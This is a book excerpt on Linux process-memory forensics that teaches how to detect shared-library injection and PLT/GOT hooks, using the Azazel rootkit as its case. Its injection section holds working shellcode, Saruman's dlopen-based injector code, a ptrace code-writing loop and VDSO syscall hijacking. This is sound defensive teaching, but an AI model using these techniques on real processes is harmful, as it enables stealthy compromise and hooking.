Learning Linux Binary Analysis by Ryan "elfmaster" O'Neill, published by Packt Publishing, 2016

Detecting the ET_DYN injection

I think that the most prevalent type of process infection is DLL injection, also known as .so injection. It is a clean and effective solution that suits the needs of most attackers and runtime malware. Let's take a look at an infected process, and I will highlight the ways in which we can identify parasite code.

Note

The terms shared object, shared library, DLL, and ET_DYN are all used synonymously throughout this book, especially in this particular section.

Azazel userland rootkit detection

Our infected process is a simple test program named ./host that is infected with the Azazel userland rootkit. Azazel is the newer version of the popular Jynx rootkit. Both of these rootkits rely on LD_PRELOAD to load a malicious shared library that hijacks various glibc shared library functions. We will inspect the infected process using various GNU tools and the Linux environment, such as the /proc filesystem.

Mapping out the process address space

The first step while analyzing a process is to map out the address space. The most straightforward way to do this is by looking at the /proc/<pid>/maps file. We want to take note of any strange file mappings and segments with odd permissions. Also in our case, we may need to check the stack for environment variables, so we will want to take note of its location in memory.

Note

The pmap <pid> command can also be used instead of cat /proc/<pid>/maps. I prefer looking directly at the maps file because it shows the entire address range of each memory segment and the complete file path of any file mappings, such as shared libraries.

Here's an example of memory mappings of an infected process ./host:

$ cat /proc/`pidof host`/maps
00400000-00401000 r-xp 00000000 00:24 5553671       /home/user/git/azazel/host
00600000-00601000 r--p 00000000 00:24 5553671       /home/user/git/azazel/host
00601000-00602000 rw-p 00001000 00:24 5553671       /home/user/git/azazel/host
0066c000-0068d000 rw-p 00000000 00:00 0              [heap]
3001000000-3001019000 r-xp 00000000 08:01 11406078  /lib/x86_64-linux-gnu/libaudit.so.1.0.0
3001019000-3001218000 ---p 00019000 08:01 11406078  /lib/x86_64-linux-gnu/libaudit.so.1.0.0
3001218000-3001219000 r--p 00018000 08:01 11406078  /lib/x86_64-linux-gnu/libaudit.so.1.0.0
3001219000-300121a000 rw-p 00019000 08:01 11406078  /lib/x86_64-linux-gnu/libaudit.so.1.0.0
300121a000-3001224000 rw-p 00000000 00:00 0
3003400000-300340d000 r-xp 00000000 08:01 11406085    /lib/x86_64-linux-gnu/libpam.so.0.83.1
300340d000-300360c000 ---p 0000d000 08:01 11406085    /lib/x86_64-linux-gnu/libpam.so.0.83.1
300360c000-300360d000 r--p 0000c000 08:01 11406085    /lib/x86_64-linux-gnu/libpam.so.0.83.1
300360d000-300360e000 rw-p 0000d000 08:01 11406085    /lib/x86_64-linux-gnu/libpam.so.0.83.1
7fc30ac7f000-7fc30ac81000 r-xp 00000000 08:01 11406070 /lib/x86_64-linux-gnu/libutil-2.19.so
7fc30ac81000-7fc30ae80000 ---p 00002000 08:01 11406070 /lib/x86_64-linux-gnu/libutil-2.19.so
7fc30ae80000-7fc30ae81000 r--p 00001000 08:01 11406070 /lib/x86_64-linux-gnu/libutil-2.19.so
7fc30ae81000-7fc30ae82000 rw-p 00002000 08:01 11406070 /lib/x86_64-linux-gnu/libutil-2.19.so
7fc30ae82000-7fc30ae85000 r-xp 00000000 08:01 11406068 /lib/x86_64-linux-gnu/libdl-2.19.so
7fc30ae85000-7fc30b084000 ---p 00003000 08:01 11406068 /lib/x86_64-linux-gnu/libdl-2.19.so
7fc30b084000-7fc30b085000 r--p 00002000 08:01 11406068 /lib/x86_64-linux-gnu/libdl-2.19.so
7fc30b085000-7fc30b086000 rw-p 00003000 08:01 11406068 /lib/x86_64-linux-gnu/libdl-2.19.so
7fc30b086000-7fc30b241000 r-xp 00000000 08:01 11406096 /lib/x86_64-linux-gnu/libc-2.19.so
7fc30b241000-7fc30b440000 ---p 001bb000 08:01 11406096 /lib/x86_64-linux-gnu/libc-2.19.so
7fc30b440000-7fc30b444000 r--p 001ba000 08:01 11406096 /lib/x86_64-linux-gnu/libc-2.19.so
7fc30b444000-7fc30b446000 rw-p 001be000 08:01 11406096 /lib/x86_64-linux-gnu/libc-2.19.so
7fc30b446000-7fc30b44b000 rw-p 00000000 00:00 0
7fc30b44b000-7fc30b453000 r-xp 00000000 00:24 5553672   /home/user/git/azazel/libselinux.so
7fc30b453000-7fc30b652000 ---p 00008000 00:24 5553672   /home/user/git/azazel/libselinux.so
7fc30b652000-7fc30b653000 r--p 00007000 00:24 5553672   /home/user/git/azazel/libselinux.so
7fc30b653000-7fc30b654000 rw-p 00008000 00:24 5553672   /home/user/git/azazel/libselinux.so
7fc30b654000-7fc30b677000 r-xp 00000000 08:01 11406093    /lib/x86_64-linux-gnu/ld-2.19.so
7fc30b847000-7fc30b84c000 rw-p 00000000 00:00 0
7fc30b873000-7fc30b876000 rw-p 00000000 00:00 0
7fc30b876000-7fc30b877000 r--p 00022000 08:01 11406093   /lib/x86_64-linux-gnu/ld-2.19.so
7fc30b877000-7fc30b878000 rw-p 00023000 08:01 11406093   /lib/x86_64-linux-gnu/ld-2.19.so
7fc30b878000-7fc30b879000 rw-p 00000000 00:00 0
7fff82fae000-7fff82fcf000 rw-p 00000000 00:00 0          [stack]
7fff82ffb000-7fff82ffd000 r-xp 00000000 00:00 0          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]

The areas of interest in the preceding maps output for the ./host process are the libselinux.so mappings and the [stack] region. In particular, notice the shared library with the /home/user/git/azazel/libselinux.so path. This should immediately grab your attention because libselinux.so is the name of a system library that is normally stored with all the other shared libraries (for example, under /lib or /usr/lib), yet here it is loaded from a user's home directory.

This could indicate possible shared library injection (also known as the ET_DYN injection), which would mean that this is not the authentic libselinux.so library. The first thing that we might check for in this case is the LD_PRELOAD environment variable to see whether it was used to preload the libselinux.so library.
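The visual check described above can also be scripted. The following is a minimal sketch, not a tool from this book: it parses one line of the maps file and flags shared objects that live outside a short list of standard library directories. The names parse_maps_line and is_suspicious_library and the directory list are assumptions made for illustration, and the code assumes a 64-bit system where unsigned long can hold a full address.

```c
#include <stdio.h>
#include <string.h>

/* One parsed line of /proc/<pid>/maps. */
struct map_entry {
    unsigned long start, end, offset;
    char perms[5];
    char path[256];              /* empty for anonymous mappings */
};

/* Parse a single maps line. Returns 0 on success, -1 on malformed input. */
int parse_maps_line(const char *line, struct map_entry *m)
{
    unsigned int dev_major, dev_minor;
    unsigned long inode;
    int n;

    m->path[0] = '\0';
    n = sscanf(line, "%lx-%lx %4s %lx %x:%x %lu %255[^\n]",
               &m->start, &m->end, m->perms, &m->offset,
               &dev_major, &dev_minor, &inode, m->path);
    return n >= 7 ? 0 : -1;      /* the path field is optional */
}

/* Hypothetical policy: directories where system libraries normally live. */
static const char *std_lib_dirs[] = {
    "/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", NULL
};

/* Return 1 if the mapping looks like a shared object outside those dirs. */
int is_suspicious_library(const struct map_entry *m)
{
    if (strstr(m->path, ".so") == NULL)
        return 0;                /* not a shared object by name */
    for (int i = 0; std_lib_dirs[i] != NULL; i++) {
        if (strncmp(m->path, std_lib_dirs[i], strlen(std_lib_dirs[i])) == 0)
            return 0;
    }
    return 1;
}
```

A location-based check like this is only a first filter. Legitimate software sometimes ships private libraries elsewhere, and an attacker with root access can place a malicious library in a standard directory.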

Finding LD_PRELOAD on the stack

The environment variables for a program are stored near the bottom of the stack at the beginning of a program's runtime. The bottom of the stack is actually the highest address (the beginning of the stack), since the stack grows into smaller addresses on the x86 architecture. Based on the output from /proc/<pid>/maps, we can get the location of the stack:

STACK_TOP           STACK_BOTTOM
7fff82fae000   -    7fff82fcf000

So, the environment strings sit just below 0x7fff82fcf000. Using GDB, we can attach to the process and quickly locate the environment variables on the stack by using the x/s <address> command, which tells GDB to display memory as a NUL-terminated string. The x/4096s <address> command does the same thing for up to 4,096 consecutive strings; in practice, the dump ends when GDB reaches the end of the stack mapping.

We can safely presume that the environment variables will be in the last 4,096 bytes of the stack mapping, and since the stack grows into lower addresses, we must start reading at <stack_bottom> - 4096.

Note

The argv and envp pointers point to command-line arguments and environment variables respectively. We are not looking for the actual pointers but rather the strings that these pointers reference.

Here's an example of using GDB to read environment variables on a stack:

$ gdb -q -p `pidof host`
(gdb) x/4096s (0x7fff82fcf000 - 4096)

… scroll down a few pages …

0x7fff82fce359:  "./host"
0x7fff82fce360:  "LD_PRELOAD=./libselinux.so"
0x7fff82fce37b:  "XDG_VTNR=7"
---Type <return> to continue, or q <return> to quit---
0x7fff82fce386:  "XDG_SESSION_ID=c2"
0x7fff82fce398:  "CLUTTER_IM_MODULE=xim"
0x7fff82fce3ae:  "SELINUX_INIT=YES"
0x7fff82fce3bf:  "SESSION=ubuntu"
0x7fff82fce3ce:  "GPG_AGENT_INFO=/run/user/1000/keyring-jIVrX2/gpg:0:1"
0x7fff82fce403:  "TERM=xterm"
0x7fff82fce40e:  "SHELL=/bin/bash"

… truncated …

As we can see from the preceding output, we have verified that LD_PRELOAD was used to preload libselinux.so into the process. This means that any glibc functions within the program that have the same name as any functions in the preloaded shared library will be overridden and effectively hijacked by the ones in libselinux.so.
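The same strings that GDB printed from the stack are laid out as a block of NUL-terminated NAME=value entries, and the kernel exposes the initial environment in that same layout through /proc/<pid>/environ. As a rough sketch, assuming the block has already been read into a buffer (from either source), a search for a variable such as LD_PRELOAD might look like this. The function name find_env_value is an assumption made for illustration.

```c
#include <stddef.h>
#include <string.h>

/*
 * Search a block of NUL-terminated "NAME=value" strings for `name`.
 * Returns a pointer to the value inside the block, or NULL if absent.
 */
const char *find_env_value(const char *block, size_t len, const char *name)
{
    size_t name_len = strlen(name);
    size_t pos = 0;

    while (pos < len) {
        const char *entry = block + pos;
        const char *nul = memchr(entry, '\0', len - pos);
        size_t entry_len;

        if (nul == NULL)
            break;               /* unterminated trailing data */
        entry_len = (size_t)(nul - entry);

        if (entry_len > name_len &&
            strncmp(entry, name, name_len) == 0 &&
            entry[name_len] == '=')
            return entry + name_len + 1;

        pos += entry_len + 1;    /* skip the entry and its NUL */
    }
    return NULL;
}
```

Keep in mind that a process can modify its own environment after startup, so the absence of LD_PRELOAD in such a block does not prove that nothing was preloaded.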

In other words, if the ./host program calls the fopen function from glibc and libselinux.so contains its own version of fopen, then that is the fopen function that will be stored in the PLT/GOT (the .got.plt section) and used instead of the glibc version. This leads us to the next indicated item—detecting function hijacking in the PLT/GOT (the PLT's global offset table).

Detecting PLT/GOT hooks

Before checking the PLT/GOT that is in the ELF section called .got.plt (which is in the data segment of the executable), let's see which functions in the ./host program have relocations for the PLT/GOT. Remember from the chapter on ELF internals that the relocation entries for the global offset table are of the <ARCH>_JUMP_SLOT type. Refer to the ELF(5) manual for details.

Note

The relocation type for the PLT/GOT is called <ARCH>_JUMP_SLOT because the entries are just that: jump slots. They contain function pointers that the PLT uses with jmp instructions to transfer control to the destination function. The actual relocation types are named R_X86_64_JUMP_SLOT, R_386_JMP_SLOT, and so on depending on the architecture.

Here's an example of identifying shared library functions:

$ readelf -r host
Relocation section '.rela.plt' at offset 0x418 contains 7 entries:
000000601018  000100000007 R_X86_64_JUMP_SLO 0000000000000000 unlink + 0
000000601020  000200000007 R_X86_64_JUMP_SLO 0000000000000000 puts + 0
000000601028  000300000007 R_X86_64_JUMP_SLO 0000000000000000 opendir + 0
000000601030  000400000007 R_X86_64_JUMP_SLO 0000000000000000 __libc_start_main+0
000000601038  000500000007 R_X86_64_JUMP_SLO 0000000000000000 __gmon_start__+0
000000601040  000600000007 R_X86_64_JUMP_SLO 0000000000000000 pause + 0
000000601048  000700000007 R_X86_64_JUMP_SLO 0000000000000000 fopen + 0

We can see that there are several well-known glibc functions being called. It is possible that some or all of these are being hijacked by the impostor shared library libselinux.so.
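The second column of the readelf output is the raw r_info field of each Elf64_Rela entry. As a small worked example, the macros from <elf.h> split that value into the symbol index (upper 32 bits) and the relocation type (lower 32 bits). The two helper names below are assumptions made for illustration.

```c
#include <elf.h>
#include <stdint.h>

/* Return 1 if an Elf64_Rela r_info value describes an x86_64 jump slot. */
int is_jump_slot(uint64_t r_info)
{
    return ELF64_R_TYPE(r_info) == R_X86_64_JUMP_SLOT;
}

/* Index into .dynsym of the symbol that the relocation refers to. */
uint32_t reloc_symbol_index(uint64_t r_info)
{
    return (uint32_t)ELF64_R_SYM(r_info);
}
```

For the fopen entry, 000700000007 decodes to symbol index 7 and type 7, which is R_X86_64_JUMP_SLOT.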

Identifying incorrect GOT addresses

From the readelf output that displays the PLT/GOT entries in the ./host executable, we can see the address of each symbol. Let's take a look at the global offset table in the memory for the following symbols: fopen, opendir, and unlink. It is possible that these have been hijacked and no longer point to the libc.so library.

Here's an example of the GDB output displaying the GOT values:

(gdb) x/gx 0x601048
0x601048 <fopen@got.plt>:  0x00007fc30b44e609
(gdb) x/gx 0x601018
0x601018 <unlink@got.plt>:  0x00007fc30b44ec81
(gdb) x/gx 0x601028
0x601028 <opendir@got.plt>:  0x00007fc30b44ed77

A quick look at the executable memory region of the libselinux.so shared library shows us that the addresses displayed in the GOT by GDB point to functions within libselinux.so and not libc.so:

7fc30b44b000-7fc30b453000 r-xp  /home/user/git/azazel/libselinux.so
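The comparison made here by eye is a simple range lookup. The following sketch, with a hypothetical struct region and owner_of function, shows how a GOT value could be attributed to the mapping that contains it once the executable regions have been collected from the maps file.

```c
#include <stddef.h>

/* An executable mapping taken from /proc/<pid>/maps. */
struct region {
    unsigned long start;   /* inclusive */
    unsigned long end;     /* exclusive, as in the maps file */
    const char *path;
};

/* Return the path of the region containing addr, or NULL if none does. */
const char *owner_of(const struct region *regions, size_t count,
                     unsigned long addr)
{
    for (size_t i = 0; i < count; i++) {
        if (addr >= regions[i].start && addr < regions[i].end)
            return regions[i].path;
    }
    return NULL;
}
```

With the text mappings of libc-2.19.so and libselinux.so from the earlier output, the fopen GOT value 0x00007fc30b44e609 resolves to libselinux.so, which is the hook we are looking for.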

With this particular malware (Azazel), the malicious shared library was preloaded using LD_PRELOAD, which made verifying the library as suspicious an easy task. This is not always the case, as many forms of malware will inject the shared library via ptrace() or shellcode that uses either mmap() or __libc_dlopen_mode(). The heuristics for determining whether or not a shared library has been injected will be detailed in the next section.

Note

As we will see in the following chapter, the ECFS technology for process memory forensics has some features that make identifying injected DLLs and other types of ELF objects almost trivial.

ET_DYN injection internals

As we just demonstrated, detecting shared libraries that have been preloaded with LD_PRELOAD is rather simple. What about shared libraries that were injected into a remote process? Or in other words, shared objects that were inserted into a pre-existing process? It is important to know whether or not a shared library was maliciously injected if we want to be able to take the next step and detect PLT/GOT hooks. First, we must identify all the ways in which a shared library can be injected into a remote process, as we briefly discussed in section 7.2.2.

Let's look at a concrete example of how this might be accomplished. Here is some example code from Saruman that injects PIE executables into a process.

Note

PIE executables are in the same format as shared libraries, so the same code will work for the injection of either type into a process.

Using the readelf utility, we can see that in the standard C library (libc.so.6), there exists a function named __libc_dlopen_mode. This function actually accomplishes the same thing as the dlopen function, which is not resident in libc. This means that with any process that uses libc, we can get the dynamic linker to load whatever ET_DYN object we want to, while also automatically handling all the relocation patches.

Example – finding the symbol for __libc_dlopen_mode

It is rather common for attackers to use this function to load ET_DYN objects into a process:

$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep dlopen
  2128: 0000000000136160   146 FUNC    GLOBAL DEFAULT   12 __libc_dlopen_mode@@GLIBC_PRIVATE

Code example – the __libc_dlopen_mode shellcode

The following code is in C, but when compiled into machine code, it can be used as shellcode that we inject into the process using ptrace:

#define __RTLD_DLOPEN 0x80000000 //glibc internal dlopen flag emulates dlopen behaviour
__PAYLOAD_KEYWORDS__ void * dlopen_load_exec(const char *path, void *dlopen_addr)
{
        void * (*libc_dlopen_mode)(const char *, int) = dlopen_addr;
        void *handle = (void *)0xfff; //initialized for debugging
        handle = libc_dlopen_mode(path, __RTLD_DLOPEN|RTLD_NOW|RTLD_GLOBAL);
        __RETURN_VALUE__(handle);
        __BREAKPOINT__;
}

Notice that one of the arguments is void *dlopen_addr. Saruman locates the address of the __libc_dlopen_mode() function, which resides in libc.so. This is accomplished using a function for resolving symbols within the libc library.

Code example – libc symbol resolution

There are many more details to the following code, and I would highly encourage you to check out Saruman. It is specifically for injecting executable programs that are compiled as ET_DYN objects, but as mentioned previously, the injection method will also work for shared libraries since they are also compiled as ET_DYN objects:

Elf64_Addr get_sym_from_libc(handle_t *h, const char *name)
{
        int fd, i;
        struct stat st;
        Elf64_Addr libc_base_addr = get_libc_addr(h->tasks.pid);
        Elf64_Addr symaddr;
        
        if ((fd = open(globals.libc_path, O_RDONLY)) < 0) {
                perror("open libc");
                exit(-1);
        }
        
        if (fstat(fd, &st) < 0) {
                perror("fstat libc");
                exit(-1);
        }
        
        uint8_t *libcp = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
        if (libcp == MAP_FAILED) {
                perror("mmap libc");
                exit(-1);
        }
        
        symaddr = resolve_symbol((char *)name, libcp);
        if (symaddr == 0) {
                printf("[!] resolve_symbol failed for symbol '%s'\n", name);
                printf("Try using --manual-elf-loading option\n");
                exit(-1);
        }
        symaddr = symaddr + globals.libc_addr;

        DBG_MSG("[DEBUG]-> get_sym_from_libc() addr of __libc_dl_*: %lx\n", symaddr);
        return symaddr;

}
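The last step of the function above adds the symbol's value from the libc file to the address at which libc is loaded in the target process. The following is a simplified sketch of that arithmetic and is not Saruman's actual get_libc_addr(): find_lib_base and runtime_symbol_addr are hypothetical helpers, and the text of /proc/<pid>/maps is assumed to have been read into a string already.

```c
#include <stdio.h>
#include <string.h>

/*
 * Return the start address of the first mapping whose path contains
 * `needle` and whose file offset is 0 (the mapping that begins with the
 * ELF header), or 0 if no such mapping exists.
 */
unsigned long find_lib_base(const char *maps_text, const char *needle)
{
    const char *line = maps_text;

    while (*line != '\0') {
        unsigned long start, end, offset;
        char perms[5], path[256], buf[512];
        size_t n = strcspn(line, "\n");
        size_t copy = n < sizeof(buf) - 1 ? n : sizeof(buf) - 1;

        /* Work on a private copy so sscanf cannot run into the next line. */
        memcpy(buf, line, copy);
        buf[copy] = '\0';
        path[0] = '\0';

        if (sscanf(buf, "%lx-%lx %4s %lx %*x:%*x %*u %255[^\n]",
                   &start, &end, perms, &offset, path) >= 4 &&
            offset == 0 && strstr(path, needle) != NULL)
            return start;

        line += n;
        if (*line == '\n')
            line++;
    }
    return 0;
}

/* Runtime address = load base + st_value taken from the file's symbol table. */
unsigned long runtime_symbol_addr(unsigned long lib_base, unsigned long st_value)
{
    return lib_base + st_value;
}
```

Using the numbers shown in this section, and assuming that the libc inspected with readelf is the same file that is mapped at 0x7fc30b086000, __libc_dlopen_mode would be found at 0x7fc30b086000 + 0x136160 = 0x7fc30b1bc160.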

To further demystify shared library injection, let me show you a much simpler technique that uses ptrace injected shellcode to open()/mmap() the shared library into the process address space. This technique is fine to use, but it requires that the malware manually handle all of the hot patching of relocations. The __libc_dlopen_mode() function handles all of this transparently with the help of the dynamic linker itself, so it is actually easier in the long run.

Code example – the x86_32 shellcode to mmap() an ET_DYN object

The following shellcode can be injected into an executable segment within a given process and then be executed using ptrace.

Note that this is the second time I've used this hand-written shellcode as an example in the book. I wrote it in 2008 for a 32-bit Linux system, and it was convenient to use as an example. Otherwise, I'm sure I would have written something new to demonstrate a more modern approach in x86_64 Linux:

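_start:
        jmp B
A:

        # fd = open("/lib/libtest.so.1.0", O_RDONLY);

        xorl %eax, %eax         # clear %eax so that movb yields exactly 5
        movb $5, %al            # __NR_open
        popl %ebx               # path string; its address was pushed by call A
        xorl %ecx, %ecx         # flags = O_RDONLY
        int $0x80

        subl $24, %esp          # room for six 32-bit mmap arguments

        # mmap(0, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, fd, 0);

        xorl %edx, %edx
        movl %edx, (%esp)       # addr = 0
        movl $8192, 4(%esp)     # length
        movl $7, 8(%esp)        # PROT_READ|PROT_WRITE|PROT_EXEC
        movl $2, 12(%esp)       # MAP_PRIVATE
        movl %eax, 16(%esp)     # fd returned by open
        movl %edx, 20(%esp)     # offset = 0
        movl $90, %eax          # __NR_mmap (old style: %ebx points to the arguments)
        movl %esp, %ebx
        int $0x80

        # the int3 will pass control back to the tracer
        int3
B:
        call A
        .string "/lib/libtest.so.1.0"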

Use PTRACE_POKETEXT to inject the shellcode and PTRACE_SETREGS to set %eip to its entry point. Once the shellcode hits the int3 instruction, it effectively passes control back to the program that is performing the infection, which can then simply detach from the host process that is now infected with the shared library (/lib/libtest.so.1.0).
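PTRACE_POKETEXT writes one machine word per call, so an injector has to split its payload into words. The following is a minimal sketch of that copy loop only, under several assumptions: pack_word and poke_code are hypothetical helper names, the caller has already attached to the target and the target is stopped, and addr points to memory that may be overwritten. Saving the original bytes and redirecting the instruction pointer with PTRACE_GETREGS and PTRACE_SETREGS are left out.

```c
#include <stddef.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>

/*
 * Build one machine word from up to sizeof(long) code bytes.
 * Unused trailing bytes are filled with int3 (0xcc).
 */
long pack_word(const unsigned char *code, size_t n)
{
    long word;

    if (n > sizeof(word))
        n = sizeof(word);
    memset(&word, 0xcc, sizeof(word));
    memcpy(&word, code, n);
    return word;
}

/*
 * Copy len bytes of code into the stopped tracee at addr, one word at a
 * time. Returns 0 on success, or -1 if a ptrace call fails.
 */
int poke_code(pid_t pid, unsigned long addr,
              const unsigned char *code, size_t len)
{
    for (size_t off = 0; off < len; off += sizeof(long)) {
        long word = pack_word(code + off, len - off);

        if (ptrace(PTRACE_POKETEXT, pid, (void *)(addr + off),
                   (void *)word) == -1)
            return -1;
    }
    return 0;
}
```

Because the final word is padded, this loop can overwrite up to sizeof(long) - 1 bytes beyond the payload. An injector that intends to restore the process would first read the original words with PTRACE_PEEKTEXT.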

In some cases, such as on binaries that have PaX mprotect restrictions enabled (https://pax.grsecurity.net/docs/mprotect.txt), the ptrace system call cannot be used to inject shellcode into the text segment. This is because it is read-only, and the restrictions will also prevent marking the text segment writeable, so you cannot simply get around this. However, this can be circumvented in several ways, such as by setting the instruction pointer to __libc_dlopen_mode and storing the arguments to the function in registers (such as %rdi, %rsi, and so on). Alternatively, in the case of a 32-bit architecture, the arguments can be stored on the stack.

Another way is by manipulating the VDSO code that is present in most processes.

Manipulating VDSO to perform dirty work

This technique is demonstrated at http://vxheaven.org/lib/vrn00.html, and the general idea is simple. The VDSO code that is mapped to the process address space, as seen in the /proc/<pid>/maps output earlier in this chapter, contains code that invokes system calls via the syscall (for 64-bit) and sysenter (for 32-bit) instructions. The calling convention for system calls in Linux always places the system call number in the %eax/%rax register.

If an attacker uses ptrace(PTRACE_SYSCALL, …), they can quickly locate the syscall instruction in the VDSO code and replace the register values to invoke whichever system call is desired. If this is done carefully and done while restoring the original system call that was executing, then it will not cause the application to crash. The open and mmap system calls can be used to load an executable object such as ET_DYN or ET_REL into the process address space. Alternatively, they can be used to simply create an anonymous memory mapping that can store shellcode.

The following is the VDSO code that an attacker takes advantage of on a 32-bit system:

ffffe420 <__kernel_vsyscall>:
ffffe420:       51                      push   %ecx
ffffe421:       52                      push   %edx
ffffe422:       55                      push   %ebp
ffffe423:       89 e5                   mov    %esp,%ebp
ffffe425:       0f 34                   sysenter

Note

On a 64-bit system, the VDSO contains at least two locations where the syscall instruction is used. The attacker can manipulate either of these.

The following is the VDSO code that an attacker takes advantage of on a 64-bit system:

ffffffffff700db8:       b0 60                   mov    $0x60,%al
ffffffffff700dba:       0f 05                   syscall

Shared object loading – legitimate or not?

The dynamic linker is the only legitimate way to bring a shared library into a process. Remember, however, that an attacker can use the __libc_dlopen_mode function, which invokes the dynamic linker to load an object. So how do we tell when the dynamic linker is doing legitimate work? There are three legitimate ways in which a shared object is mapped to a process by the dynamic linker.

Legitimate shared object loading

Let's look at what we consider legitimate shared object loading:

  • There is a valid DT_NEEDED entry in the executable program that corresponds to the shared library file.
  • The shared libraries that are validly loaded by the dynamic linker may in turn have their own DT_NEEDED entries in order to load other shared libraries. This can be called transitive shared library loading.
  • If a program is linked with libdl.so, then it may use the dynamic loading functions to load libraries on the fly. The function for loading shared objects is named dlopen, and the function for resolving symbols is named dlsym.
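To make the first two cases concrete, here is a rough sketch of how the DT_NEEDED entries of a dynamic segment can be enumerated. It assumes a 64-bit ELF object and that the caller has already located the dynamic array and the dynamic string table (DT_STRTAB) in memory. The function name collect_needed is an assumption made for illustration.

```c
#include <elf.h>
#include <stddef.h>

/*
 * Collect up to `max` DT_NEEDED names from a dynamic array that is
 * terminated by DT_NULL. `strtab` is the dynamic string table.
 * Returns the number of names stored in `names`.
 */
size_t collect_needed(const Elf64_Dyn *dyn, const char *strtab,
                      const char **names, size_t max)
{
    size_t count = 0;

    for (; dyn->d_tag != DT_NULL; dyn++) {
        /* d_val of a DT_NEEDED entry is an offset into the string table. */
        if (dyn->d_tag == DT_NEEDED && count < max)
            names[count++] = strtab + dyn->d_un.d_val;
    }
    return count;
}
```

Running the same routine over each library that it names yields the transitive set. Note that DT_NEEDED holds names such as libc.so.6, whereas the maps file shows the resolved file (libc-2.19.so in the earlier output), so a comparison between the two has to resolve symbolic links first.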

Note

As we have previously discussed, the LD_PRELOAD environment variable also invokes the dynamic linker, but this method is in a gray area as it is commonly used for both legitimate and illegitimate purposes. Therefore, it was not included in the list of legitimate shared object loading.

Illegitimate shared object loading

Now, let's take a look at the illegitimate ways in which a shared object can be loaded into a process, that is to say, by an attacker or a malware instance:

  • The __libc_dlopen_mode function exists within libc.so (not libdl.so) and is not intended to be called by a program. It is actually marked as a GLIBC_PRIVATE function. Most processes have libc.so, and this is therefore a function commonly used by attackers or malware to load arbitrary shared objects.
  • VDSO manipulation. As we have already demonstrated, this technique can be used to execute arbitrary syscalls, and therefore it can be simple to memory-map a shared object with this method.
  • Shellcode that directly invokes the open and mmap system calls.
  • The DT_NEEDED entries can be added by an attacker by overwriting the DT_NULL tag in the dynamic segment of an executable or shared library, thus being able to tell the dynamic linker to load whatever shared object they wish. This particular method was discussed in Chapter 6, ELF Binary Forensics in Linux, and it falls more into the topic of that chapter, but it may also be necessary when inspecting a suspicious process.

Note

Be sure to inspect the binary of a suspicious process, and verify that the dynamic segment doesn't appear suspicious. Refer to the Checking the dynamic segment for DLL injection traces section of Chapter 6, ELF Binary Forensics in Linux.

Now that we have a clear definition of legitimate versus illegitimate loading of shared objects, we can get into the discussion of heuristics for detecting when a shared library is legitimate or not.

Beforehand, it is worth noting again that LD_PRELOAD is commonly used for good as well as bad purposes, and the only sure-fire way of knowing this is by inspecting what the actual code that resides in the preloaded shared object does. Therefore, we will leave LD_PRELOAD out of the discussion on heuristics here.

Heuristics for .so injection detection

In this section, I will describe the general principles behind detecting whether a shared library is legitimate or not. In Chapter 8, ECFS – Extended Core File Snapshot Technology, we will be discussing the ECFS technology, which actually incorporates these heuristics into its feature set.

For now, let's look at the principles only. We want to get a list of the shared libraries that are mapped to the process and then see which ones qualify for being legitimately loaded by the dynamic linker:

  1. Get a list of shared object paths from the /proc/<pid>/maps file.

    Note

    Some maliciously injected shared libraries won't appear as file mappings because the attacker created anonymous memory mappings and then memcpy'd the shared object code into those memory regions. In the next chapter, we will see that ECFS can weed these more stealthy entities out as well. A scan can be done of each executable memory region that is anonymously mapped to see whether ELF headers exist, particularly those with the ET_DYN file type.

  2. Determine whether or not a valid DT_NEEDED entry exists in the executable that corresponds to the shared library you are seeing. If one exists, then it is a legitimate shared library. After you have verified that a given shared library is legitimate, check that shared library's dynamic segment and enumerate the DT_NEEDED entries within it. Those corresponding shared libraries can also be marked as legitimate. This goes back to the concept of transitive shared object loading.
  3. Look at the PLT/GOT of the process's actual executable program. If dlopen appears among its relocations, analyze the code to find each call to dlopen. The dlopen calls may be passed arguments that can be inspected statically, like this for instance:
    void *handle = dlopen("somelib.so", RTLD_NOW);

    In such cases, the string will be stored as a static constant and will therefore be in the .rodata section of the binary. So, check whether the .rodata section (or wherever the string is stored) contains any strings that contain the shared library path you are trying to validate.

  4. If any of the shared object paths found in the maps file cannot be accounted for by a DT_NEEDED entry or by any dlopen call, then it was either preloaded by LD_PRELOAD or injected by some other means. At this point, you should qualify the shared object as suspicious.
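The scan of anonymous executable regions mentioned in the note to step 1 comes down to a header check. The following sketch assumes that the first bytes of a region have already been copied out of the process (for example, from /proc/<pid>/mem) and that the object is a 64-bit ELF in native byte order. The function name looks_like_et_dyn is an assumption made for illustration.

```c
#include <elf.h>
#include <stddef.h>
#include <string.h>

/*
 * Return 1 if buf starts with an ELF header whose file type is ET_DYN
 * (a shared library or PIE executable), and 0 otherwise.
 */
int looks_like_et_dyn(const unsigned char *buf, size_t len)
{
    Elf64_Ehdr ehdr;

    if (len < sizeof(ehdr))
        return 0;
    memcpy(&ehdr, buf, sizeof(ehdr));   /* avoid unaligned access */

    if (memcmp(ehdr.e_ident, ELFMAG, SELFMAG) != 0)
        return 0;
    return ehdr.e_type == ET_DYN;
}
```

A match in an anonymous, executable mapping is a strong hint but not proof, since an attacker can wipe the ELF header after loading the object.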

Tools for detecting PLT/GOT hooks

Currently, there are not many great tools that are specifically for process memory analysis in Linux. This is the reason that I designed ECFS (discussed in Chapter 8, ECFS – Extended Core File Snapshot Technology). There are only a few tools I know of that can detect PLT/GOT overwrites, and each one of them essentially uses the same heuristics that we just discussed:

  • Linux VMA Voodoo: This tool is a prototype that I designed through the DARPA CFT program in 2011. It is capable of detecting many types of process memory infections, but currently only works on 32-bit systems and is not available to the public. However, the newer ECFS utility, which was inspired by VMA Voodoo, is open source. You may read about VMA Voodoo at http://www.bitlackeys.org/#vmavudu.
  • ECFS (Extended core file snapshot) technology: This technology was originally designed to work as a native snapshot format for process memory forensics tools in Linux. It has evolved into something even more than that and has an entire chapter dedicated to it (Chapter 8, ECFS – Extended Core File Snapshot Technology). It can be found at https://github.com/elfmaster/ecfs.
  • Volatility plt_hook: The Volatility software is primarily geared towards full system memory analysis, but Georg Wicherski designed a plugin in 2013 that is specifically for detecting PLT/GOT infections within a process. This plugin uses heuristics similar to those that we previously discussed. This feature has since been merged into the Volatility source code at https://github.com/volatilityfoundation/volatility.